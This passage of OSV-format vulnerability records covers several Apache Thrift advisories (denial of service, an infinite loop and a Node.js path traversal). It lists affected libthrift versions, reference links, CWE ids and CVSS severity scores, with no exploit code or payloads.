"ECOSYSTEM", "events": [ { "introduced": "0.9.3" }, { "fixed": "0.14.0" } ] } ], "versions": [ "0.10.0", "0.11.0", "0.12.0", "0.13.0", "0.9.3", "0.9.3-1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-g2fg-mr77-6vrm/GHSA-g2fg-mr77-6vrm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13949" }, { "type": "WEB", "url": "https://github.com/apache/hbase/pull/2958" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3574bc1036b577b265be510e6b208f0a5d5d84cd7198347dc8482df@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raea1bb8cf2eb39c5e10543f547bdbbdbb563c2ac6377652f161d4e37@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae95c2234b6644bfd666b2671a1b42a09f38514d0f27cca3c7d5d55a@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rada9d2244a66ede0be29afc5d5f178a209f9988db56b9b845d955741@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad635e16b300cf434280001ee6ecd2ed2c70987bf16eb862bfa86e02@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/race178e9500ab8a5a6112667d27c48559150cadb60f2814bc67c40af@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9f7c755790313e1adb95d29794043fb102029e803daf4212ae18063@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7371efd8363c1cd0f5331aafd359a808cf7277472b8616d7b392128@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3f7f06a1759c8e2985ed24ae2f5483393c744c1956d661adc873f2c@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ec75f690dd60fec8621ba992290962705d5b7f0d8fd0a42fab0ac9f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b51e7c253cb0989b4c03ed9f4e5f0478e427473357209ccc4d08ebf@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r995b945cc8f6ec976d8c52d42ba931a688b45fb32cbdde715b6a816a@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r950ced188d62320fdb84d9e2c6ba896328194952eff7430c4f55e4b0@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r93f23f74315e009f4fb68ef7fc794dceee42cf87fe6613814dcd8c70@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90b4473950e26607ed77f3d70f120166f6a36a3f80888e4eeabcaf91@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8dfbefcd606af6737b62461a45a9af9222040b62eab474ff2287cf75@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r89fdd39965efb7c6d22bc21c286d203252cea476e1782724aca0748e@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r890b8ec5203d70a59a6b1289420d46938d9029ed706aa724978789be@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8897a41f50d4eb19b268bde99328e943ba586f77779efa6de720c39f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r886b6d9a89b6fa0aafbf0a8f8f14351548d6c6f027886a3646dbd075@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r869331422580d35b4e65bd74cf3090298c4651bf4f31bfb19ae769da@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r850522c56c05aa06391546bdb530bb8fc3437f2b77d16e571ae73309@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r812915ecfa541ad2ca65c68a97b2c014dc87141dfaefc4de85049681@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ae909438ff5a2ffed9211e6ab0bd926396fd0b1fc33f31a406ee704@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7597683cc8b87a31ec864835225a543dad112d7841bf1f17bf7eb8db@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74eb88b422421c65514c23cb9c2b2216efb9254317ea1b6a264fe6dc@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r741364444c3b238ab4a161f67f0d3a8f68acc517a39e6a93aa85d753@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202107-32" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbb01bb85cdc2022f3b96bdc416dbfcb49a2855b3a340aa88b2e1de9@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf75979ae0ffd526f3afa935a8f0ee13c82808ea8b2bc0325eb9dcd90@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf741d08c7e0ab1542c81ea718467422bd01159ed284796a36ad88311@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf65df763f630163a3f620887efec082080555cee1adb0b8eaf2c7ddb@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf603d25213cfff81d6727c259328846b366fd32a43107637527c9768@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf568168e7f83871969928c0379813da6d034485f8b20fa73884816d6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdcf00186c34d69826d9c6b1f010136c98b00a586136de0061f7d267e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdc8e0f92d06decaee5db58de4ded16d80016a7db2240a8db17225c49@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd78cdd87d84499a404202f015f55935db3658bd0983ecec81e6b18c6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd49d53b146d94a7d3a135f6b505589655ffec24ea470e345d31351bb@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd370fdb419652c5219409b315a6349b07a7e479bd3f151e9a5671774@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0734d91f16d5b050f0bcff78b4719300042a34fadf5e52d0edf898e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcdf62ecd36e39e4ff9c61802eee4927ce9ecff1602eed1493977ef4c@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcae4c66f67e701db44d742156dee1f3e5e4e07ad7ce10c740a76b669@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcace846f74ea9e2af2f7c30cef0796724aa74089f109c8029b850163@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc896ce7761999b088f3adabcb99dde2102b6a66130b8eec6c8265eab@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7a79b08822337c68705f16ee7ddcfd352313b836e78a4b86c7a7e3d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7a241e0af086b226ff9ccabc4a243d206f0f887037994bfd8fcaaeb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc48ab5455bdece9a4afab53ca0f1e4f742d5baacb241323454a87b4e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbfbb81e7fb5d5009caf25798f02f42a7bd064a316097303ba2f9ed76@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5cad06a46d23253a3c819229efedecfc05f89ef53f5fdde77a86d6@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb91c32194eb5006f0b0c8bcdbd512c13495a1b277d4d51d45687f036@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51977d392b01434b0b5df5c19b9ad5b6178cfea59e676c14f24c053@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb44ec04e5a9b1f87fef97bb5f054010cbfaa3b8586472a3a38a16fca@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72c3d1582d50b2ca7dd1ee97e81c847a5cf3458be26d42653c39d7a6@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r298a25228868ebc0943d56c8f3641212a0962d2dbcf1507d5860038e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r286e9a13d3ab0550042997219101cb87871834b8d5ec293b0c60f009@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27b7d3d95ffa8498899ef1c9de553d469f8fe857640a3f6e58dba640@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r278e96edc4bc13efb2cb1620a73e48f569162b833c6bda3e6ea18b80@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r20f6f8f8cf07986dc5304baed3bf4d8a1c4cf135ff6fe3640be4d7ec@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fb2d26b81c64ce96c4fd42b9e6842ff315b02c36518213b6c057350@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dea91f0562e0a960b45b1c5635b2a47b258b77171334276bcf260a7@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r196409cc4df929d540a2e66169104f2b3b258d8bd96b5f083c59ee51@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r191a9279e2863b68e5496ee4ecd8be0d4fe43b324b934f0d1f106e1d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18732bb1343894143d68db58fe4c8f56d9cd221b37f1378ed7373372@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17cca685ad53bc8300ee7fcfe874cb784a222343f217dd076e7dc1b6@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179119bbfb5610499286a84c316f6789c5afbfa5340edec6eb28d027@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15eed5d21e16a5cce810c1e096ffcffc36cd08c2f78ce2f9b24b4a6a@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1504886a550426d3c05772c47b1a6350c3235e51fd1fdffbec43e974@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1456eab5f3768be69436d5b0a68b483eb316eb85eb3ef6eba156a302@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143ca388b0c83fe659db14be76889d50b453b0ee06f423181f736933@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r13f40151513ff095a44a86556c65597a7e55c00f5e19764a05530266@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r12090c81b67d21a814de6cf54428934a5e5613fde222759bbb05e99b@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r117d5d2b08d505b69558a2a31b0a1cf8990cd0385060b147e70e76a9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1084a911dff90b2733b442ee0f5929d19b168035d447f2d25f534fe4@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r08a7bd19470ef8950d58cc9d9e7b02bc69c43f56c601989a7729cce5@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0372f0af2dad0b76fbd7a6cfdaad29d50384ad48dda475a5026ff9a3@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02f7771863383ae993eb83cdfb70c3cb65a355c913242c850f61f1b8@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02ba8db500d15a5949e9a7742815438002ba1cf1b361bdda52ed40ca@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01b34416677f1ba869525e1b891ac66fa6f88c024ee4d7cdea6b456b@%3Cissues.hbase.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/hbase" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c5b7324274fd361b038c5cc316e99344b7ae20beae7163214fac14d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ba4f0817f98bf7c1cb314301cb7a24ba11a0b3e7a5be8b0ae3190b0@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ae3c68b0bfe430fb32f24236475276b6302bed625b23f53b68748b5@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r699c031e6921b0ad0f943848e7ba1d0e88c953619d47908618998f76@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6990c849aeafe65366794bfd002febd47b7ffa8cf3c059b400bbb11d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r668aed02e287c93403e0b8df16089011ee4a96afc8f479809f1fc07f@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r635133a74fa07ef3331cae49a9a088365922266edd58099a6162a5d3@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r62aa6d07b23095d980f348d330ed766560f9a9e940fec051f534ce37@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r587b4a5bcbc290269df0906bafba074f3fe4e50d4e959212f56fa7ea@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r533a172534ae67f6f17c4d33a1b814d3d5ada9ccd4eb442249f33fa2@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r515e01a30443cfa2dbb355c44c63149869afd684fb7b0344c58fa67b@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4fa53eacca2ac38904f38dc226caebb3f2f668b2da887f2fd416f4a7@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d90b6d8de9697beb38814596d3a0d4994fa9aba1f6731a2c648d3ae@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r449288f6a941a2585262e0f4454fdefe169d5faee33314f6f89fab30@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43dc2b2e928e9d845b07ac075634cb759d91bb852421dc282f87a74a%40%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r421a9a76811c1aed7637b5fe5376ab14c09ccdd7b70d5211d6e76d1e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r409e296c890753296c544a74d4de0d4a3ce719207a5878262fa2bd71@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f97dbbbb1b2a7324521208bb595392853714e141a37b8f68d395835@%3Cnotifications.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f3e1d562c528b4bafef2dde51f79dd444a4b68ef24920d68068b6f9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3e31ec7e8c39db7553be4f4fd4d27cf27c41f1ba9c985995c4ea9c5a@%3Cnotifications.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3de0e0c26d4bd00dd28cab27fb44fba11d1c1d20275f7cce71393dd1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3a1291a7ab8ee43db87cb0253371489810877028fc6e7c68dc640926@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3550b61639688e0efbc253c6c3e6358851c1f053109f1c149330b535@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f6a547f226579f542eb08793631d1f2d47d7aed7e2f9d11a4e6af9f@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ed66a3823990306b742b281af1834b9bc85f98259c870b8ffb13d93@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d180180f37c2ab5cebd711d080d01d8452efa8ad43c5d9cd7064621@%3Cissues.hbase.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-12T19:44:27Z", "nvd_published_at": "2021-02-12T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rj7p-rfgp-852x", "published": "2022-05-24T17:00:01Z", "modified": "2024-03-10T05:16:21.459619Z", "aliases": [ "CVE-2019-0205" ], "related": [ "CGA-3p6j-9f2g-h7xg" ], "summary": "Loop with Unreachable Exit Condition in Apache Thrift", "details": "In Apache Thrift all versions up to and including 0.12.0, a server or client may run into an endless loop when feed with specific input data. Because the issue had already been partially fixed in version 0.11.0, depending on the installed version it affects only certain language bindings.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.13.0" } ] } ], "versions": [ "0.10.0", "0.11.0", "0.12.0", "0.6.1", "0.7.0", "0.8.0", "0.9.0", "0.9.1", "0.9.2", "0.9.3", "0.9.3-1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.12.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rj7p-rfgp-852x/GHSA-rj7p-rfgp-852x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0205" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4633082b834eebccd0d322697651d931ab10ca9c51ee7ef18e1f60f4@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r50bf84c60867574238d18cdad5da9f303b618114c35566a3a001ae08@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r53c03e1c979b9c628d0d65e0f49dd9a9f9d7572838727ad11b750575@%3Cuser.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55609613abab203a1f2c1f3de050b63ae8f5c4a024df0d848d6915ff@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r569b2b3da41ff45bfacfca6787a4a8728edd556e185b69b140181d9d@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r573029c2f8632e3174b9eea7cd57f9c9df33f2f706450e23fc57750a@%3Ccommits.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67a704213d13326771f46c84bbd84c8281bb93946e155e0e40abcb4c@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r73a3c8b80765e3d2430ff51f22b778d0c917919f01815b69ed16cf9d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7859e767c90c8f4971dec50f801372aa64e88f143c3e8a265a36f9b4@%3Cuser.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92b7771afee2625209c36727fefdc77033964e9a1daa81ec3327e625@%3Cuser.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r934f312dd5add7276ac2de684d8b237554ff9f34479a812df5fd6aee@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab740e5c70424ef79fd095a4b076e752109aeee41c4256c2e5e5e142@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb139fa1d2714822d8c6e6f3bd6f5d5c91844d313201185c409288fd9@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba61c1f3a3b1960a6a694775b1a437751eba0825f30188f69387fe90@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce0d368a78b42c545f26c2e6e91e2b8a91b27b60d0cb45fe1911d337@%3Cnotifications.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re387dc6ca11cb0b0ce4de8e800bb91ca50fee054b80105f5cd34adcb@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf359e5cc6a185494fc0cfe837fe82f7db2ef49242d35cbf3895aebce@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202107-32" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/003ac686189e6ce7b99267784d04bf60059a8c323eeda5a79a0309b8@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/07bd68ad237a5d513751d6d2731a8828f902c738ea57d85c1a72bad3@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d058e1bfd11727c4f2e2adf4b6e403a47c38e22431ab20066a1ac79@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1193444c17f499f92cd198d464a2c1ffc92182c83487345a854914b3@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1c18ec6ebfea0a9211992be952e8b33d0fda202c077979b84a5e09a8@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3dfa054b89274c9109c26ed1843ca15a14c03786f4016d26773878ae@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/928cae83d20d8d8196c26118f7084aa37573e1d31162381fb9454fb5@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9f7150d0b02e72d1154721a412e80cf797f1b7cfa295fcefc67b1381@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a9669756befaeb0f8e08766d3f4d410a0fce85da3a570506f71f0b67@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c606d4be9aa163d132edf8edd8eb55e7b9464063b99acbbf6e9e287@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d08f5576286f4a042aabde13ecf58979644f6dc210f25aa9a4d469b@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r137753c9df8dd9065bea27a26af49aadc406b5a57fc584fefa008afd@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b1a92c229ead94d53b3bcde9e624d002b54f1c6fdb830b9f4da20e1@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r228ac842260c2c516af7b09f3cf4cf76e5b9c002e359954a203ab5a5@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2832722c31d78bef7526e2c701ba4b046736e4c851473194a247392f@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3887b48b183b6fa43e59398bd170a99239c0a16264cb5175b5b689d0@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/thrift-dev/201910.mbox/%3CVI1PR0101MB2142E0EA19F582429C3AEBCBB1920%40VI1PR0101MB2142.eurprd01.prod.exchangelabs.com%3E" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2022-06-27T16:12:09Z", "nvd_published_at": "2019-10-29T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vx85-mj8c-4qm6", "published": "2019-01-17T13:56:33Z", "modified": "2024-02-16T08:22:18.795904Z", "aliases": [ "CVE-2018-11798" ], "related": [ "CGA-pmq8-4h9g-36mm" ], "summary": "Apache Thrift Node.js static web server sandbox escape", "details": "The Apache Thrift Node.js static web server in versions 0.9.2 through 0.11.0 have been determined to contain a security vulnerability in which a remote user has the ability to access files outside the set webservers docroot path.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.9.2" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.0", "0.11.0", "0.9.2", "0.9.3", "0.9.3-1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-vx85-mj8c-4qm6/GHSA-vx85-mj8c-4qm6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11798" }, { "type": "WEB", "url": "https://github.com/apache/thrift/pull/1606" }, { "type": "WEB", "url": "https://github.com/apache/thrift/commit/2a2b72f6c8aef200ecee4984f011e06052288ff2" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1545" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vx85-mj8c-4qm6" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/THRIFT-4647" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6e9edd282684896cedf615fb67a02bebfe6007f2d5baf03ba52e34fd@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227094236/http://www.securityfocus.com/bid/106501" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-538" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:58:46Z", "nvd_published_at": null, "severity": "MODERATE" }, 